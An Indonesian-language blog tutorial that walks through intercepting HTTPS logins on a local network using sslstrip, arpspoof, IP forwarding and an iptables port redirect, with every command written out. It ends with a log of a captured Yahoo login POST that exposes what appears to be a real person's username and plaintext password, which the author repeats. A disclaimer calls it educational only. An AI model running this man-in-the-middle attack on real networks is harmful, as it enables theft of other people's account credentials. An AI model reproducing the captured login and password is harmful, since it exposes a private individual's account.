setelah ane membahas tentang bagaimana menaklukan https dengan ettercap.. agaknya ane harus membahas bagaimana menghantam https dengan sslstrip… ok langsung aja deh …
caution : semua tutorial ini hanyalah untuk pengetahuan semata… segala tindak kejahatan atau penyalahgunaan dari tutorial ini bukan tanggung jawab saya ….
informasi target ..
ip address ane : 192.168.1.34
ip address target : 192.168.1.2
ip gateway : 192.168.1.1
options sesion …
Code:
zee-laptop@IBTeam:~$ sslstrip --help
sslstrip 0.6 by Moxie Marlinspike
Usage: sslstrip
Usage: sslstrip
Options:
-w, –write= Specify file to log to (optional).
-p , –post Log only SSL POSTs. (default)
-s , –ssl Log all SSL traffic to and from server.
-a , –all Log all SSL and HTTP traffic to and from server.
-l, –listen= Port to listen on (default 10000).
-f , –favicon Substitute a lock favicon on secure requests.
-k , –killsessions Kill sessions in progress.
-h Print this help message.
-w
-p , –post Log only SSL POSTs. (default)
-s , –ssl Log all SSL traffic to and from server.
-a , –all Log all SSL and HTTP traffic to and from server.
-l
-f , –favicon Substitute a lock favicon on secure requests.
-k , –killsessions Kill sessions in progress.
-h Print this help message.
note :
-opsi -a digunakan untuk logging semua trafic ( http,https)
-opsi -s digunakan untuk logging traficc ssl saja
-opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 )
-opsi : -w : tempat file dump akan disimpan.
-opsi -a digunakan untuk logging semua trafic ( http,https)
-opsi -s digunakan untuk logging traficc ssl saja
-opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 )
-opsi : -w : tempat file dump akan disimpan.
ok … to the point ..
Code:
zee-laptop@IBTeam:~$ sslstrip -a -w tespwnd
sslstrip 0.6 by Moxie Marlinspike running…
sekarang jalankan arp ..
Code:
zee-laptop@IBTeam:~$ arpspoof -i eth0 -t 192.168.1.2 192.168.1.1
dengan keterangan syntax..
opsi -i ( interface )
opsi -t ip address secara spesifik ( target ) ( gateway )
opsi -i ( interface )
opsi -t ip address secara spesifik ( target ) ( gateway )
klo bt ente lom ada arpspoof .. install dolo dsniff
Code:
zee-laptop@IBTeam:~$ sudo apt-get install dsniff
langkah berikutnya kita aktifkan ip forward ..
Code:
zee-laptop@IBTeam:~$ su root
root@IBTeam:/home/zee-laptop# echo 1 > /proc/sys/net/ipv4/ip_forward
redirect port victim ( 80 ) ke port sslstrip (10000)
Code:
root@IBTeam:/home/zee-laptop# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
nanti tinggal buka jaring untuk liat hasil tangkapan ..
Code:
root@IBTeam:/home/zee-laptop# cat ssl | grep -i "passwd="
url+=”?”;if(valid_js()){var passwd=form.passwd.value;var challen
function hash2(form){var passwd=form.passwd.value
2011-03-26 22:12:10,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K.IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=nitharamadhan&passwd=imutkucintaku&.save=Sign+In
function hash2(form){var passwd=form.passwd.value
2011-03-26 22:12:10,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K.IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=nitharamadhan&passwd=imutkucintaku&.save=Sign+In
hmm berarti user = nitharamadhan …
pass = imutkucintaku
pass = imutkucintaku
sorry no ss coz koneksi ane cuma pake telkomflash paling murah,.. upload makan quota… thx….
Sumber : Zee Eichel
0 comments:
Posting Komentar